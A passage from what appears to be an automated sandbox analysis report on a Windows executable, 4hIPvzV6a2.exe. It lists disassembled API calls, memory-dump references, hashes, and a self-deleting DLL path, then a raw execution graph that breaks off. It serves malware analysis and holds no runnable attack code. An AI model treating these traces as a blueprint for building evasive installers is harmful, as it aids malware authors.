                                        • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                        • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401D9F
                                        • GetClientRect.USER32(?,?), ref: 00401DEA
                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                        • DeleteObject.GDI32(00000000), ref: 00401E3E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                        • String ID:
                                        • API String ID: 1849352358-0
                                        • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                        • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                        • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E56
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID:
                                        • API String ID: 3808545654-0
                                        • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                        • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                        • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                        APIs
                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: !
                                        • API String ID: 1777923405-2657877971
                                        • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                        • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                        • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                        • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                        APIs
                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                        • wsprintfW.USER32 ref: 00404E2D
                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: ItemTextlstrlenwsprintf
                                        • String ID: %u.%u%s%s
                                        • API String ID: 3540041739-3551169577
                                        • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                        • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                        • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                        APIs
                                        • CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                        • CharNextW.USER32(00000000), ref: 00405EE4
                                        • CharNextW.USER32(00000000), ref: 00405EFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: C:\
                                        • API String ID: 3213498283-3404278061
                                        • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                        • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                        • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                        APIs
                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                        • lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E48
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrcatlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2659869361-3081826266
                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                        • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                        APIs
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll), ref: 0040269A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dll
                                        • API String ID: 1659193697-4073180849
                                        • Opcode ID: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                        • Instruction ID: 71653ae2733df7adc71dfdbaa34589fb2472b89c06e6b839d1f3baa03dac964a
                                        • Opcode Fuzzy Hash: 36d8dbc523c0472d64c73d4eff13f49a76aa2362c52378c6c93c1f1da3cddc08
                                        • Instruction Fuzzy Hash: E011E772A40205BBCB00ABB19E56AAE7671AF50748F21443FF402B71C1EAFD4891565E
                                        APIs
                                        • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                        • GetTickCount.KERNEL32 ref: 0040304F
                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                        • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                        • String ID:
                                        • API String ID: 2102729457-0
                                        • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                        • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                        • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                        • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 0040557F
                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                          • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                        • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                        • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                        APIs
                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,0042BA48,?,00000800,00000000,?,0042BA48,?,?,Del,?,00000000,00406696,80000002), ref: 0040646B
                                        • RegCloseKey.ADVAPI32(?), ref: 00406476
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Del
                                        • API String ID: 3356406503-3562819231
                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                        • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                        APIs
                                        • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                        • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-3081826266
                                        • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                        • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                        • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                        APIs
                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4hIPvzV6a2.exe,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 00405E78
                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\4hIPvzV6a2.exe,C:\Users\user\Desktop\4hIPvzV6a2.exe,80000000,00000003), ref: 00405E88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-224404859
                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                        • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                        • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                        • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                        • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69

                                        Execution Graph

                                        Execution Coverage:4.4%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:4.4%
                                        Total number of Nodes:1736
                                        Total number of Limit Nodes:56
                                        execution_graph 41489 7ff686856b2a 41490 7ff686856b45 41489->41490 41491 7ff686856b33 41489->41491 41492 7ff686856b59 41490->41492 41493 7ff686856cbf 41490->41493 41754 7ff686833f80 41491->41754 41497 7ff686833f80 35 API calls 41492->41497 41494 7ff686856cc5 41493->41494 41495 7ff686856d0f 41493->41495 41498 7ff686856cd2 CreateFileW 41494->41498 41499 7ff686856ccf 41494->41499 41500 7ff686856d19 41495->41500 41501 7ff686856e55 41495->41501 41502 7ff686856b83 41497->41502 41503 7ff686856d0a 41498->41503 41504 7ff686856e36 41498->41504 41499->41498 41585 7ff68684a350 41500->41585 41501->41504 41507 7ff686856e5b 41501->41507 41506 7ff686833f80 35 API calls 41502->41506 41509 7ff686856d57 GetKernelObjectSecurity 41503->41509 41512 7ff686856e43 RegCloseKey 41504->41512 41513 7ff686856d3e 41504->41513 41511 7ff686856baf 41506->41511 41769 7ff686829520 41507->41769 41514 7ff686856d7e 41509->41514 41525 7ff686856e11 ctype 41509->41525 41510 7ff686856d34 41510->41504 41510->41509 41510->41513 41768 7ff6868342a0 58 API calls 3 library calls 41511->41768 41512->41513 41517 7ff686856e67 41513->41517 41520 7ff686856ef1 GetNamedSecurityInfoW 41513->41520 41522 7ff686856d8e GetLastError 41514->41522 41523 7ff686856df1 GetKernelObjectSecurity 41514->41523 41516 7ff686856e2d CloseHandle 41516->41504 41518 7ff686856fdc MakeAbsoluteSD GetLastError 41517->41518 41519 7ff686856da1 ISource 41517->41519 41521 7ff686857032 GetLastError 41518->41521 41541 7ff68685708e ctype 41518->41541 41527 7ff686856dce ISource 41519->41527 41580 7ff68685743f 41519->41580 41520->41517 41520->41519 41521->41519 41521->41527 41522->41519 41522->41527 41523->41525 41524 7ff686856bc0 ISource 41524->41493 41526 7ff686856c5c 41524->41526 41528 7ff686857445 41524->41528 41529 7ff68685744b 41524->41529 41525->41504 41525->41516 41531 7ff686856c93 ISource 41526->41531 41526->41580 41786 7ff686862180 41527->41786 41532 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41528->41532 41535 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41529->41535 41531->41527 41532->41529 41534 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41534->41528 41536 7ff686857451 41535->41536 41537 7ff686857452 41536->41537 41538 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41537->41538 41540 7ff686857457 41538->41540 41539 7ff68685765d ISource 41548 7ff686857fe7 41539->41548 41554 7ff6868576aa ISource ctype 41539->41554 41540->41539 41800 7ff686856970 33 API calls 4 library calls 41540->41800 41542 7ff68685716f 41541->41542 41782 7ff68683be10 35 API calls 5 library calls 41541->41782 41545 7ff686857189 MakeAbsoluteSD 41542->41545 41783 7ff68683be10 35 API calls 5 library calls 41542->41783 41546 7ff6868571e6 IsValidSid 41545->41546 41547 7ff68685720f 41545->41547 41546->41547 41551 7ff6868571f3 ctype 41546->41551 41552 7ff686857218 IsValidSid 41547->41552 41553 7ff686857241 41547->41553 41555 7ff6868688fc _invalid_parameter_noinfo_noreturn 31 API calls 41548->41555 41550 7ff686857185 41550->41545 41784 7ff68685ec20 IsValidSid GetLengthSid CopySid ctype 41551->41784 41552->41553 41557 